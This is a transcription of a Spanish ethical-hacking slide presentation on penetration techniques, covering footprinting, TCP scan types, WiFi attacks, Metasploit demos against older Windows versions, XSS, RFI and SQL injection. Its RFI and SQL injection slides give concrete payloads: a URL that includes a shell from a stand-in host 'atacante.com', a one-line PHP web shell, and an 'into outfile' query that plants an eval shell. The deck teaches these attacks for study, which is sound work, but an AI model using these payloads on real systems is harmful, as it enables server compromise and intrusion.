Técnicas avanzadas de penetración a sistemas

Slides:



Advertisements
Presentaciones similares
Presentación – Web Attack
Advertisements

1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.
1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.
GFI LANguard Network Security Scanner Version 8 .0 !
Nau Gran dHivern Intr. a la creación y gestión de páginas web Introducción a la web.
Internet y tecnologías web
Virus informático Daniel Cochez III Año E.
Seguridad en Internet Cortafuegos/Proxy Lizbeth Huamantuma H.
Hoy en día cuando nos hablan de servidores pensamos tanto en grandes bases de datos como en servidores web, con una capacidad tan grande que pueden soportar.
Introducción a servidores
Servidores Windows Http Ftp …
Jessica Lizeth Flores Guerrero Coral Jazmín Ramírez Ortiz
Errores comunes al desarrollar websites
Diseñar un sistema que permita al usuario desde un teléfono móvil acceder a su computador personal (o servidor) a través de WAP para administrar algunos.
Manuel H. Santander P. Equipo de Seguridad y Contingencia Informática
Ping, Nmap y Nessus Alumnos: Morales Peralta Luis Grupo: 2
Trabajar en una pequeña o mediana empresa o ISP. Capítulo 7
Especialista en Business Intelligence Integration Services SSIS (Sesión 7) Microsoft SQL Server 2008 R2 (2013) Suscribase a o escríbanos.
Tecnológico de Estudios Superiores de Coacalco ING. SISTEMAS COMPUTACIONALES Por: Marlenne Pérez Garibay.
DETECCIÓN DE INTRUSOS rodríguez García Juan Carlos 3812
Propósito Introducción Tema Actividades de aprendizaje Actividades de aprendizaje El éxito fundamental de la web se basa en tres aspectos principales:
PROGRAMA DE MAESTRÍA EN REDES DE INFORMACION Y CONECTIVIDAD MRIC-I
Curso de PHP Tema 6: Seguridad.
Ethical Hacking con BackTrack.
Oportunidad de canal Actualizar software de servidor Actualizar hardware de servidor Proporcionar servicios de migración de aplicaciones Estos productos.
BUFFER OVERFLOW Y EXPLOITS
Ataques a redes y NMAP (Network Mapper)
ADMINISTRACION DE REDES TEMA REDIRECCIONES Y REENVÍOS NO VALIDADOS
NetBios Auth Bypassing Undercon Objetivo inicial: Obtener acceso a un sistema remoto.
Universidad de La Coruña Escuela Universitaria Politécnica Control de Procesos por Computador Diego Cabaleiro 24 de Noviembre 2009.
1.Firewall 2.Herramientas de detección de intrusión 3.Recuperación de datos PREVENCIÓN/DETECCIÓN Y RECUPERACIÓN ALARCON BELLO MIGUEL ANGEL.
Auditoría de Sistemas y Software
WEB VULNERABLE DVWA Universidad de Almería
The OWASP Foundation OWASP AppSec Aguascalientes 2010 Guía de Desarrollo Seguro Francisco Aldrete Miembro de OWASP capítulo Aguascalientes.
Ataques y contramedidas. Un ataque es cualquier acción que viole la seguridad. Un ataque ocurre cuando una persona o un grupo de personas intentan acceder,
66.69 Criptografía y Seguridad Informática FIREWALL.
Tema 13: privacidad en la red Andrea Sánchez Ferriol Arancha Valero García.
ATAQUES POR INYECCION DE CODIGO SQL
UD 1: “Adopción de pautas de seguridad informática” Análisis de las principales vulnerabilidades de un sistema informático. Luis Alfonso Sánchez Brazales.
Ataques de Canales Encubiertos
Seguridad DNS. Javier Rodríguez Granados.
HERRAMIENTAS DE SEGURIDAD
Cuentas de usuarios y grupos en windows 2008 server
1- Las amenazas de redes  Las redes de comunicación ofrecen múltiples aplicaciones para que nos podamos comunicar así como trabajar aprender comprar.
 Claudia Jordan Idrovo.  Son los puntos de enganche para cada conexión de red que realizamos. El protocolo TCP (el utilizado en internet) identifica.
S EGURIDAD Y A LTA D ISPONIBILIDAD Nombre: Adrián de la Torre López 24/09/ Adrián de la Torre López.
Introducción a los Sistemas de Computo
UNIVERSIDAD TECNOLÓGICA ECOTEC. ISO 9001:2008 Preguntas para ser analizadas para el examen final. 1.- Describa el término de Escaneo de Red. 2.-Tipos de.
2: Capa Aplicación 1 Capa Aplicación: File Transfer Protocol ELO322: Redes de Computadores Agustín J. González Este material está basado en:  Material.
SEGURIDAD INFORMÁTICA.
File Transfer Protocol.
Ing. Elizabeth Guerrero V.
Johnny Alexander Salazar Jhon Fredy Giraldo Giraldo Sebastián Cardona.
Ing. Elizabeth Guerrero V.
Protocolos de Transporte y Aplicación. – TCP y UDP
Análisis de las principales vulnerabilidades de un sistema informático. Gabriel Montañés León.
Nuevas Tecnologías Sistemas de Información Riesgos Alonso Hernández Madrid, 13 de noviembre de 2007.
Secuencia de Comandos en Sitios Cruzados XSS
¿QUE ES INTERNET? La Internet es una red de redes. Actualmente conecta miles de redes para permitir compartir información y recursos a nivel mundial. Con.
Una parte esencial del trabajo informático es mantener protegida, resguardada y respaldada la información con la cual se trabaja, pues de todo ello depende.
Unidad 4. Servicios de acceso remoto
FIREWALLS, Los cortafuegos
A NÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO Luis Villalta Márquez.
YUBER ANDRÉS LOAIZA OROZCO SERVIDOR PROXY GESTIÓN DE REDES DE DATOS.
 Un backdoor como lo dice su traducción “puerta trasera” es un troyano, que permite acceder de forma remota a un host- víctima ignorando los procedimientos.
Análisis de las principales vulnerabilidades de un sistema informático. Javier Rodríguez Granados.
TIPOS DE ATAQUES Y VULNERABILIDADES EN UNA RED
Protocolos de Transporte y Aplicación
Planificación Curso UNIDAD 1. INTRODUCCIÓN A LOS SERVICIOS EN RED UNIDAD 2. SERVICIOS DHCP UNIDAD 3. SERVICIOS DNS UNIDAD 4. SERVICIOS DE ACCESO REMOTO.
Es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas. Se.
Transcripción de la presentación:

Técnicas avanzadas de penetración a sistemas Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU

HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking con fines defensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.

QUE ES UN HACKER Experto en algún campo de la informática Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.

Pasos previos al ATAQUE Reconocimiento Pasivo Activo Rastreo (escaner) Acceso Niveles del Sistema Redes DOS Mantener el acceso Borrado de huellas

FOOTPRINTING Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting). El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.

FOOTPRINTING 1.- Obtener información inicial • whois • nslookup 2.- Localizar el rango de red • Traceroute

TIPOS DE ATAQUES 8.-Inyecciones SQL 1.- Hacking WIFI 9.-R.F.I 2.-DOS 10.-XSS 11.-Inyeccion de comandos arbitrarios 12.-Hijacking 13.-Cookie poisoning 1.- Hacking WIFI 2.-DOS 3.-DDOS 4.-M.I.T 5.- Envenenamiento DNS 6.-Reverse Shell 7.-Port scaning

Hacking Wifi

Definiciones ·BSSID ·IVS ·SSID ·Mode monitor ·AP ·WEP ·STATION ·WPA ·DOS

Que Ataques analizaremos? ·Hacking WEP ·Fake AP ·Wifi DOS (A usuarios y sobre saturación de frecuencias)

Fake Ap método De Ataque y contra Ataque

DOS (Denial of service) En redes Wifi *Sobre saturacion de Frecuencias *Des-autentificacion infinita de usuarios

Detección y Análisis Wardriving

Escaneo de Puertos El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal. Nos permite : Explorar Identificar Comprender

Técnicas Tipo de escaneo Otros Medio abierto Barridos Abierto Silencioso UDP scan TCP connect () TCP SYN TCP FIN TCP echo FTP bounce scan Reverse Ident Zombie scan ACK Scan UDP echo Null Scan TCP ACK TCP SYN Xmas Scan ICMP echo SYN/ACK Scan Fragmentación TCP

TCP connect() La mas común de cualquier software de escaneo de puertos consiste en usar la llamada connect() de TCP Intenta establecer conexión Si conecta el puerto esta abierto si no , el puerto esta cerrado Si no contesta esta silencioso Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones *Logs

Comportamiento TCP connect() Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED Hacker------[SYN]-------[*] Puerto TCP Victima SILENT

*Excelentes resultados TCP SYN Técnica conocida como Half-open scan, escaneo medio abierto por excelencia se envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión *Discreto *Excelentes resultados

Comportamiento TCP SYN Hacker ---[SYN]---> [O] P. TCP abierto en la Victima Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima Hacker ---[RST]---> [O] P. TCP abierto en la Victima Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima

ACK scan Destinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no. Envía paquetes ACK con números de secuencia y confirmación aleatorios. si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suya si el puerto esta cerrado responderá RST pero si no responde es que esta filtrado. * Apoyo de un escaneo anterior *Variable del ping si responde RST esta vivo si no es in alcanzable. *Identificar firewall bloqueando SYN.

Comportamiento ACK scan Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima

Null scan Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso. Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.

Comportamiento Null scan Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima local ---[ ]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima

La razón

POC Analizar 2 tipos de escaneo con la intención de evadir un firewall y obtener información acerca de los puertos abiertos.

Ataques MIT DNS cache poisoning ARP Poisoning Phishing

EXPLOTACION

Escáner de vulnerabilidades

Escáner de vulnerabilidades

EXPLOTACION

Metasploit Windows Server 2003

Penetración Windows Server 2003 prueba de concepto Puerto 445 ms08067 Crear usuario Habilitar Escritorio Remoto Cambiar la contraseña del Administrador OBJETIVO Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.

Metasploit Windows Server 2008 R2

Metasploit Windows Server 2008 R2 Numero de vulnerabilidad : ms09050 Encontrar el servidor verificando versión de smb Explotar la vulnerabilidad Denegación de servicios. OBJETIVO Mostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.

Metasploit Windows XP SP3

Metasploit Penetración a Windows XP SP3 Prueba de concepto Encontrar la victima verificando versión de SMB Lograr la obtención de una reverse shell Habilitar el uso de escritorio remoto Inyectar la conexión a escritorio remoto OBJETIVO Mostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.

Metasploit Windows 7

Metasploit Windows 7 Penetración Prueba de concepto Usar INGENIERIA SOCIAL Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL Vulnerar navegador web. UPLOAD MI PATH C:\DESTINO\\Downloads OBJETIVO Mostrar el ataque de penetración a windows 7 en un ambiente controlado.

Ataques WEB

Ataques XSS Analicemos la vulnerabilidad de xss Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador

Ataques XSS

Ataques XSS

Ataques XSS

Ataques RFI Remote file inclusion vulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto. RFI se aprovecha del uso irresponsable de las funciones include y requiere, las cuales, debido al limitado conocimiento del programador y las pocas o nulas validaciones que realiza antes de incluir una variable recibida por parametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scripts programados para explotar dicha vulnerabilidad.

Ataques RFI Remote file inclusion http://www.victima.com/index.php?nav=pagina1php http://www.victimacom/index.php?nav=pagina2.php <?php print system($_GET['command']); ?> http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls

Inyeccion SQL union all select "<?php eval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"

Analicemos este código <?php $link = mysql_connect('127.0.0.1','root', 'pass'); mysql_select_db('ejemplo', $link); $sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link); if(mysql_errno($link)) { echo mysql_error($link); exit; } while($row = mysql_fetch_assoc($sql)) { echo $ row['id']." ".$row['titulo']." ".$row['contenido']." ".$row['parent']; }? >

Busqueda de tablas.

Prueba de concepto OBJETIVO Mostrar el ataque de inyección SQL y la técnica de intrusión de SHELL en un ambiente controlado.

EL RESULTADO llegando a una conclusión

El resultado.

Ponente: Rafael Gómez Del Ángel GRACIAS Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU